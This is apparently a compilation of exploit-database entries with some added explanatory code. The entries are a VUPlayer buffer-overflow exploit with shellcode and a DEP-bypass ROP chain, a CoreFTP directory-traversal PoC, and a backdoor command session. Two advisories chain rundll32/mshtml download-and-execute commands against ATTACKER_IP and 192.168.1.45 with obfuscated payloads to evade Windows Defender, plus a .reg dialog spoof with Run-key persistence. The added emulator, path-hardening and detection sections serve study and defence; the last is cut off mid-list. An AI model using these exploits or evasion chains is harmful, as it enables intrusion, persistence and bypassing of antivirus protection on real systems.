<pre><code># Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)<br /># Date: 26/06/2021<br /># Exploit Author: Bryan Leong <NobodyAtall><br /># Vendor Homepage: http://www.vuplayer.com/<br /># Software Link: [Null]<br /># Version: VUPlayer 2.49<br /># Tested on: Windows 7 x64<br /># CVE : CVE-2009-0182<br /><br /># VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)<br /># Python 3: every piece of the payload is bytes and the file is written in binary mode<br /><br />import struct<br /><br /><br />#shellcode<br />#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python<br />buf = b""<br />buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"<br />buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"<br />buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"<br />buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\xd5\xea"<br />buf += b"\xf0\xbd\x03\xc4\x01\xed\x70\x47\x81\xec\xa4\xa7\xb8"<br />buf += b"\x3e\xb9\xa6\xfd\x23\x30\xfa\x56\x2f\xe7\xeb\xd3\x65"<br />buf += b"\x34\x87\xaf\x68\x3c\x74\x67\x8a\x6d\x2b\xfc\xd5\xad"<br />buf += b"\xcd\xd1\x6d\xe4\xd5\x36\x4b\xbe\x6e\x8c\x27\x41\xa7"<br />buf += b"\xdd\xc8\xee\x86\xd2\x3a\xee\xcf\xd4\xa4\x85\x39\x27"<br />buf += b"\x58\x9e\xfd\x5a\x86\x2b\xe6\xfc\x4d\x8b\xc2\xfd\x82"<br />buf += b"\x4a\x80\xf1\x6f\x18\xce\x15\x71\xcd\x64\x21\xfa\xf0"<br />buf += b"\xaa\xa0\xb8\xd6\x6e\xe9\x1b\x76\x36\x57\xcd\x87\x28"<br />buf += b"\x38\xb2\x2d\x22\xd4\xa7\x5f\x69\xb2\x36\xed\x17\xf0"<br />buf += b"\x39\xed\x17\xa4\x51\xdc\x9c\x2b\x25\xe1\x76\x08\xd9"<br />buf += b"\xab\xdb\x38\x72\x72\x8e\x79\x1f\x85\x64\xbd\x26\x06"<br />buf += b"\x8d\x3d\xdd\x16\xe4\x38\x99\x90\x14\x30\xb2\x74\x1b"<br />buf += b"\xe7\xb3\x5c\x78\x66\x20\x3c\x51\x0d\xc0\xa7\xad"<br /> <br />#1012 bytes of padding before the saved return address is overwritten<br />junk = b"A"*1012<br /><br />#no ASLR modules<br />#BASS.dll <br />#BASSMIDI.dll<br />#BASSWMA.dll<br /><br />#check bad chars<br />#badchar = \x00, \x0a, \x1a<br /><br />#ROP Chain: VirtualProtect via PUSHAD (ESI=&VirtualProtect, EBP=jmp esp, EBX=dwSize 0x201, EDX=0x40 PAGE_EXECUTE_READWRITE, ECX=writable ptr, EDI=ROP NOP)<br />#!mona rop -m BASS.dll,BASSMIDI.dll -n -cpb '\x00\x0A\x1A'<br />def create_rop_chain():<br /><br /> rop_gadgets = [<br /> 0x10015f77, # POP EAX # RETN [BASS.dll] <br /> 0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]<br /> 0x1001eaf1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll] <br /> 0x10030950, # XCHG EAX,ESI # RETN [BASS.dll] <br /> 0x1001d748, # POP EBP # RETN [BASS.dll] <br /> 0x100222c5, # & jmp esp [BASS.dll]<br /> 0x10015fe7, # POP EAX # RETN [BASS.dll] <br /> 0xfffffdff, # Value to negate, will become 0x00000201<br /> 0x10014db4, # NEG EAX # RETN [BASS.dll] <br /> 0x10032f32, # XCHG EAX,EBX # RETN 0x00 [BASS.dll] <br /> 0x10015f77, # POP EAX # RETN [BASS.dll] <br /> 0xffffffc0, # Value to negate, will become 0x00000040<br /> 0x10014db4, # NEG EAX # RETN [BASS.dll] <br /> 0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll] <br /> 0x100163c7, # POP ECX # RETN [BASS.dll] <br /> 0x1060da06, # &Writable location [BASSMIDI.dll]<br /> 0x10603658, # POP EDI # RETN [BASSMIDI.dll] <br /> 0x1001dc05, # RETN (ROP NOP) [BASS.dll]<br /> 0x10015fe7, # POP EAX # RETN [BASS.dll] <br /> 0x90909090, # nop<br /> 0x1001d7a5, # PUSHAD # RETN [BASS.dll] <br /> ]<br /> #pack each gadget as a little-endian dword; struct.pack returns bytes, so join on bytes<br /> return b''.join(struct.pack('<I', _) for _ in rop_gadgets)<br /><br />rop_chain = create_rop_chain()<br /><br />#give some space between shellcode & ropchain<br />nop = b"\x90"*16<br /><br />payload = junk + rop_chain + nop + buf<br /><br />#binary mode: a text-mode write would translate bytes such as \x0d and break the chain<br />f = open("poc.wax", "wb")<br />f.write(payload)<br />f.close()<br /> <br /></code></pre>
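An added example, not part of the original exploit: a register-level model of the VirtualProtect ROP chain above. Each gadget's effect is taken from the mona comment beside its address and applied to the chain's dwords in order; the PUSHAD frame is then laid out so the VirtualProtect call the chain builds can be checked offline, together with the bad-char check the comments mention. VIRTUALPROTECT and CHAIN_BASE are placeholders, since the real values only exist inside a running VUPlayer process.

```python
# Added example (not part of the original exploit): a register-level model of
# the VirtualProtect ROP chain. Gadget effects come from the mona comments
# beside each address; VIRTUALPROTECT and CHAIN_BASE are placeholders that
# stand in for values only known inside a running VUPlayer process.
import struct

MASK = 0xffffffff
REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
BADCHARS = b"\x00\x0a\x1a"             # the exploit's bad-char list
VP_IAT_SLOT = 0x1060e25c               # IAT entry holding &VirtualProtect (BASSMIDI.dll)

VIRTUALPROTECT = 0x75a1c1b0            # placeholder: run-time content of the IAT slot
CHAIN_BASE = 0x0018f3f4                # placeholder: stack address of chain dword 0

# Gadget semantics from the chain's comments. Addresses that appear only as
# pop operands (the IAT slot, jmp esp, the values to negate, ...) are not here.
GADGETS = {
    0x10015f77: ("pop", "eax"),  0x10015fe7: ("pop", "eax"),
    0x1001eaf1: ("load",),       0x10030950: ("xchg", "esi"),
    0x1001d748: ("pop", "ebp"),  0x10014db4: ("neg",),
    0x10032f32: ("xchg", "ebx"), 0x10038a6d: ("xchg", "edx"),
    0x100163c7: ("pop", "ecx"),  0x10603658: ("pop", "edi"),
    0x1001d7a5: ("pushad",),
}

# The chain exactly as the exploit packs it (dword 0 overwrites the saved EIP).
ROP_GADGETS = [
    0x10015f77, VP_IAT_SLOT, 0x1001eaf1, 0x10030950,   # ESI = VirtualProtect
    0x1001d748, 0x100222c5,                            # EBP = jmp esp
    0x10015fe7, 0xfffffdff, 0x10014db4, 0x10032f32,    # EBX = 0x201 (dwSize)
    0x10015f77, 0xffffffc0, 0x10014db4, 0x10038a6d,    # EDX = 0x40 (PAGE_EXECUTE_READWRITE)
    0x100163c7, 0x1060da06,                            # ECX = writable dword (lpflOldProtect)
    0x10603658, 0x1001dc05,                            # EDI = ROP NOP
    0x10015fe7, 0x90909090,                            # EAX = nops
    0x1001d7a5,                                        # PUSHAD # RETN
]


def emulate(chain, memory=None):
    """Apply the gadget model to the chain and return the register file at
    the instant PUSHAD executes. ESP tracks which chain dword is popped next."""
    memory = {VP_IAT_SLOT: VIRTUALPROTECT} if memory is None else memory
    regs = dict.fromkeys(REGS, 0)
    eip, i = chain[0], 1                   # chain[0] was popped by the overflowed RET
    while True:
        regs["esp"] = CHAIN_BASE + 4 * i
        op, *arg = GADGETS[eip]
        if op == "pop":
            regs[arg[0]], i = chain[i], i + 1
        elif op == "load":                 # MOV EAX,DWORD PTR DS:[EAX]
            regs["eax"] = memory[regs["eax"]]
        elif op == "neg":                  # NEG EAX: 0xfffffdff -> 0x201 without \x00 bytes
            regs["eax"] = (-regs["eax"]) & MASK
        elif op == "xchg":
            regs["eax"], regs[arg[0]] = regs[arg[0]], regs["eax"]
        elif op == "pushad":
            return regs
        eip, i = chain[i], i + 1           # RETN fetches the next gadget address


def pushad_frame(regs):
    """Stack after PUSHAD, lowest address first. RETN pops EDI (the ROP NOP),
    whose RETN pops ESI (VirtualProtect); the rest is VirtualProtect's frame."""
    return [(r, regs[r]) for r in ("edi", "esi", "ebp", "esp", "ebx", "edx", "ecx", "eax")]


def virtualprotect_call(regs):
    """Decode the PUSHAD frame as the stdcall VirtualProtect invocation."""
    f = dict(pushad_frame(regs))
    return {
        "callee": f["esi"],
        "return_to": f["ebp"],         # jmp esp: lands on the 0x90909090 slot, then the sled
        "lpAddress": f["esp"],         # ESP at PUSHAD = first byte after the chain
        "dwSize": f["ebx"],
        "flNewProtect": f["edx"],
        "lpflOldProtect": f["ecx"],
    }


def pack_chain(chain):
    return b"".join(struct.pack("<I", g) for g in chain)


def bad_char_offsets(blob, badchars=BADCHARS):
    """Offsets of bytes that are on the exploit's bad-char list."""
    return [i for i, b in enumerate(blob) if b in badchars]


if __name__ == "__main__":
    call = virtualprotect_call(emulate(ROP_GADGETS))
    for k, v in call.items():
        print(f"{k:>14}: 0x{v:08x}")
    print("bad chars in chain:", bad_char_offsets(pack_chain(ROP_GADGETS)))
```

The frame shows why each register is loaded the way it is: after PUSHAD # RETN the ROP NOP in EDI chains into VirtualProtect in ESI, VirtualProtect returns into the jmp esp held in EBP, and its four arguments are the pushed ESP (the sled), EBX, EDX and ECX in prototype order.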
<pre><code># Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)<br /># Date: 08/01/2022<br /># Exploit Author: LiamInfosec<br /># Vendor Homepage: http://coreftp.com/<br /># Version: build 725 and below<br /># Tested on: Windows 10<br /># CVE : CVE-2022-22836<br /><br /># Description:<br /><br />CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.<br /><br /># Proof of Concept:<br /><br />curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops<br /><br /></code></pre>
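An added example, not CoreFTP code: the containment check a PUT handler needs before it turns the request path into a file name. naive_upload_path is the pattern the advisory exploits (document root plus request path, then normalisation, which lets ../ walk out of the root); resolve_upload_path is the hardened form. The document root and sample paths are constructed.

```python
# Added example (not CoreFTP code): vulnerable and hardened handling of the
# path in an HTTP PUT request. ROOT and the sample paths are constructed.
import posixpath
from urllib.parse import unquote


class PathEscape(ValueError):
    """The request path would name a file outside the document root."""


def naive_upload_path(root, request_path):
    """Vulnerable: concatenate, then normalise. The '..' segments are only
    clipped at the filesystem root, not at the document root."""
    return posixpath.normpath(root + request_path)


def resolve_upload_path(root, request_path):
    """Hardened: percent-decode, reject NUL and any '..' segment outright,
    and only then join onto the root. Rejecting (rather than silently
    stripping) keeps the attempt visible in the logs."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        raise PathEscape("NUL byte in request path")
    # Treat backslashes as separators too; Windows servers accept both.
    parts = decoded.replace("\\", "/").split("/")
    segments = [s for s in parts if s not in ("", ".")]
    if ".." in segments:
        raise PathEscape(f"traversal in request path: {request_path!r}")
    target = posixpath.normpath(posixpath.join(root, *segments))
    # Belt and braces: the normalised result must still sit under root.
    if posixpath.commonpath([root, target]) != root:
        raise PathEscape(f"resolved outside root: {target}")
    return target


def put_allowed(root, request_path):
    """True if the PUT may create the file, False if it was rejected."""
    try:
        resolve_upload_path(root, request_path)
        return True
    except PathEscape:
        return False


# Constructed samples against a placeholder document root: the advisory's
# PoC path, two variants of it, and a legitimate upload.
ROOT = "/srv/coreftp/www"
SAMPLES = [
    "/../../../../../../whoops",            # the PoC path from the advisory
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",     # same idea, percent-encoded
    "/docs\\..\\..\\whoops",                # backslash separators
    "/docs/report.txt",                     # legitimate
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p:40} naive -> {naive_upload_path(ROOT, p):30} allowed={put_allowed(ROOT, p)}")
```

Note that curl's --path-as-is in the PoC matters for the same reason: without it curl would collapse the ../ segments client-side and the server would never see the traversal.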
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/859aab793a42868343346163bd42f485.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Controlit.10<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 3347. Third-party attackers who can reach an infected system can run any OS commands made available by the malware further compromising the host.<br />Type: PE32<br />MD5: 859aab793a42868343346163bd42f485<br />Vuln ID: MVID-2022-0449<br />Disclosure: 01/10/2022 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 3347<br />Welcome to Control-it! Server.<br />Ready<br />HELP<br />Commands:<br />EXIT VERS LIST EXEC DELE RENM MKDR RMDR CHDR<br />WKDR UPLD DNLD SHDN REBT RELG HELP<br />Ready<br />EXEC net user HYP3RLINX 666 /add<br />Ready<br />EXEC calc<br />Ready<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Windows Defender<br /><br />Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together<br />machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in<br />your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your<br />device and in the cloud.<br /><br /><br />[Vulnerability Type]<br />Windows Defender Detection Bypass<br />TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail<br />and attackers will get an "Access is denied" error message. 
However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.<br /><br />C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)<br />Access is denied.<br /><br />Pass an extra "..\" to the path.<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)<br /><br />Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").<br />However, that detection can be bypassed by using concatenation when constructing the URL scheme portion of the payload.<br /><br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")<br />Access is denied.<br /><br />Full bypass, e.g.:<br /><br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")<br /><br />Enter, Backdoor:JS/Relvelshe.A detection.<br /><br />Windows Defender also blocks execution of the downloaded scriptlet: it is detected as "Backdoor:JS/Relvelshe.A" and removed once it lands in INetCache.<br />"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"<br /><br />However, this is easily bypassed by hex-encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").<br />Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly, passing the value to JScript's built-in eval function. 
<br /><br /><br />[References]<br />Trojan:Win32/Powessere.G<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427<br /><br />Backdoor:JS/Relvelshe.A<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426<br /><br />Advisory:<br />https://twitter.com/hyp3rlinx/status/1480651583172091904<br /><br /><br />[Exploit/PoC]<br />1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.<br /><br />python -m http.server 80<br /><br />"hi.tmp"<br /><br /><?xml version="1.0"?><br /><component><br /><script><br /><![CDATA[<br />var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str = '';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br />eval(str)<br />]]><br /></script><br /></component><br /><br /><br />2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")<br /><br /><br />BOOM!<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />January 10, 2022 : Public Disclosure<br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx)<br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec<br /><br />[Vendor]<br />www.microsoft.com<br /><br />A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.<br />.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.<br /><br /><br />[Vulnerability Type]<br />Windows .Reg File Dialog Spoof - Mitigation Bypass<br /><br /><br />[CVE Reference]<br />N/A<br /><br />[Security Issue]<br />Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message.<br />This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or<br />whatever else an attacker would like to display.<br /><br />This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the<br />registry security warning dialog box LIE to them as the warning messages are now under an attacker's control.<br /><br />It works by using a specially crafted .Reg filename, which gives control of the registry warning dialog message presented to the end user.<br /><br />In 2022 I noticed that the .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe.<br />Therefore, something has changed in the OS, possibly a silent mitigation. 
Wouldn't be the first time; back in 2016 my msinfo32.exe<br />.NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin, and that one allowed remote file access and data theft.<br /><br />In a threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update"<br />Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711<br /><br />However, the "fix" is easily bypassed and the old payload can still be made to work across systems.<br /><br />Bypassing the .Reg spoofing fix was only the start; I had to find ways to bypass two different Windows Defender detections along the way for the PoC.<br /><br />Trojan:Win32/Powessere.G<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427<br /><br />Backdoor:JS/Relvelshe.A<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426<br /><br />Let's begin...<br /><br />My original .Reg file spoofing payload of 2019 now triggers an access violation and crashes regedit.exe from an invalid pointer read.<br /><br />00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 |<br />00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename<br />00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE<br />00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes<br />00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"<br />00007FFE7A4A7C92 | 85 C9 | test ecx,ecx <br /><br />00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7<br /><br />ntdll!woutput_l+0x387:<br />00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=????<br 
/>========================================================================================================================================<br /><br />Online search shows Win-7 still makes up about 22% of the world's computers, so I asked my friend, security researcher Eduardo Braun Prado (Edu_Braun_0day),<br />to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and, with minor tweaks, on Win-10.<br /><br />Original works on Win-7, but crashes regedit.exe on Win-10:<br />Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg<br /><br />Original payload with the first mitigation bypass, works on Win-7/Win-10 (remove the second-to-last token (%1) before the %0 string terminator, and the %b characters):<br />Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg<br /><br />New payload mitigation bypass, works on both Win-7 and Win-10:<br />Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg<br /><br />However, we are NOT done yet, as we must deal with two Windows Defender detections.<br /><br />1) Trojan:Win32/Powessere.G<br />2) Backdoor:JS/Relvelshe.A<br /><br />Bypassing "Trojan:Win32/Powessere.G"<br />=====================================<br />Two components are required to defeat Trojan:Win32/Powessere.G detection in Windows Defender.<br /><br />A) extra path traversal when referencing mshtml ..\\..\\..\\<br />B) concatenation when constructing the remote server URL scheme "script"+":"+"http.<br /><br />FAIL on current updated Windows 10<br />C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)<br />Access is denied.<br /><br />SUCCESSFUL on current updated Windows 10<br />Using an extra ..\ results in a bypass, but does nothing useful, just an alert box.<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(1)<br /><br />Trying to download and execute remote code using the payload below fails again, as we need the second 
component URL scheme concat.<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp")<br />Access is denied.<br /><br />JScript concatenation of the URL scheme.<br />document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")<br /><br />Successfully bypasses "Trojan:Win32/Powessere.G" detection!<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")<br /><br />The final hurdle: Windows Defender detects the downloaded file below, named "backdoor", as Backdoor:JS/Relvelshe.A and removes it from INetCache.<br />"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\backdoor[1]"<br /><br />File "backdoor" contents.<br /><br /><?xml version="1.0"?><br /><package><br /><component id="testCalc"><br /><script language="JScript"><br /><![CDATA[<br />new ActiveXObject("WScript.Shell").Run("calc.exe"); <br />]]><br /></script><br /></component><br /></package><br /><br />Bypassing "Backdoor:JS/Relvelshe.A" detection.<br />==============================================<br />The way we do this is to hex-encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe")<br />Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly, passing the value to JScript's built-in eval function. <br /><br />var hex="6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str='';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br />eval(str)<br /><br /><br />Done! Successfully bypassed the .Reg spoof mitigation and two Windows Defender detections. 
Long Live Windows .Reg file dialog spoofing Flaw!<br /><br /><br />[References]<br />Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt<br />https://threatpost.com/windows-bug-spoof-dialog-boxes/142711/<br /><br /><br />[Mitigation Bypass, New PoC Video URL]<br />https://www.youtube.com/watch?v=QANX45jieoo<br /><br /><br />[Exploit/PoC/2022]<br />Note: The circa 2019 advisory exploit abused "Image File Execution Options" to store the payload as a debugger setting for MSIE.<br />Unfortunately, that no longer works, so we will make do for now with storing the payload on disk in a .cmd file and registry Run key.<br /><br />1) Create a .Reg Dialog Spoofing file named, Sales_Report_2022.%n%nClick YES to cancel%0.reg with below contents<br />OR use the original payload with minor alterations. Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg<br />I prefer the original because the % characters help obscure the obvious wording in the filename.<br /><br />Windows Registry Editor Version 5.00<br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] <br />"HATE"="C:\\dump\\s.cmd"<br /><br /><br />2) Create a Windows .cmd file, "s.cmd", with below contents. 
Unfortunately, it needs to be stored on disk using the path as referenced in the .Reg file above,<br />update server IP as required.<br /><br />rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")<br /><br /><br />3) Create the remote JScript component "hi.tmp" and host it on a server on port 80; it pops calc.exe using WScript.Shell.<br /><br /><?xml version="1.0"?><br /><component><br /><script><br /><![CDATA[<br />var hex= "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str = '';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br /> eval(str)<br />]]><br /></script><br /></component><br /><br /><br />4) Log out and log back into Windows, BOOM calc.exe runs!<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Original Vendor Notification: March 1, 2019<br />Original MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."<br />Then the vendor sent me a link pointing me to the "Definition of a Security Vulnerability".<br />March 10, 2019 : Public Disclosure<br /><br />Vendor Notification: <br />January 10, 2022 : Public Disclosure<br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
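An added example, mine rather than the author's: hunting logic for the two techniques documented in the Windows Defender bypass advisory above and in the rundll32 and .Reg sections of this one. The command-line check first undoes the evasions the advisories rely on (the extra ..\ hops before mshtml and the "script"+":"+"http" concatenation) so that the bypassing variants match the same rule as the blocked ones; the file-name check flags .reg names that carry %-format specifiers, the ingredient of the dialog spoof. All sample command lines and file names are constructed from the advisories' own payloads plus benign cases.

```python
# Added example (not from the advisories): hunting rules for the rundll32
# javascript:/mshtml launcher and for %-spoofed .reg file names, run over
# constructed samples.
import re

CONCAT_RE = re.compile(r'"\s*\+\s*"')            # "script"+":"+"http -> "script:http
TRAVERSAL_RE = re.compile(r'(?:\\\.\.)+\\')      # \..\..\..\mshtml -> \mshtml
RUNDLL32_JS_RE = re.compile(r'rundll32(?:\.exe)?\s+javascript:')
MSHTML_RE = re.compile(r'mshtml,runhtmlapplication')
REMOTE_SCT_RE = re.compile(r'getobject\(\s*"script:(?:https?|ftp)://')
FORMAT_SPEC_RE = re.compile(r'%[0-9A-Za-z]')     # %n, %e, %0 ... inside a file name


def normalise_cmdline(cmd):
    """Collapse JScript string concatenation and ..\\ hops, then lowercase,
    so the evasions cannot split the strings the rules look for."""
    cmd = CONCAT_RE.sub("", cmd)
    cmd = TRAVERSAL_RE.sub(r"\\", cmd)
    return cmd.lower()


def classify_cmdline(cmd):
    """Indicator names that fire for one process command line, in order."""
    norm = normalise_cmdline(cmd)
    hits = []
    if RUNDLL32_JS_RE.search(norm) and MSHTML_RE.search(norm):
        hits.append("rundll32_js_mshtml")
        if REMOTE_SCT_RE.search(norm):
            hits.append("remote_scriptlet")
            if CONCAT_RE.search(cmd):        # only visible on the raw line
                hits.append("concat_evasion")
    return hits


def suspicious_reg_name(name):
    """True for a .reg file name carrying printf-style %-specifiers, the
    ingredient of the dialog spoof (%n, %e, ..., and the %0 terminator)."""
    return name.lower().endswith(".reg") and bool(FORMAT_SPEC_RE.search(name))


# Constructed samples: the advisories' command lines plus benign rundll32 use.
SAMPLE_CMDLINES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)',
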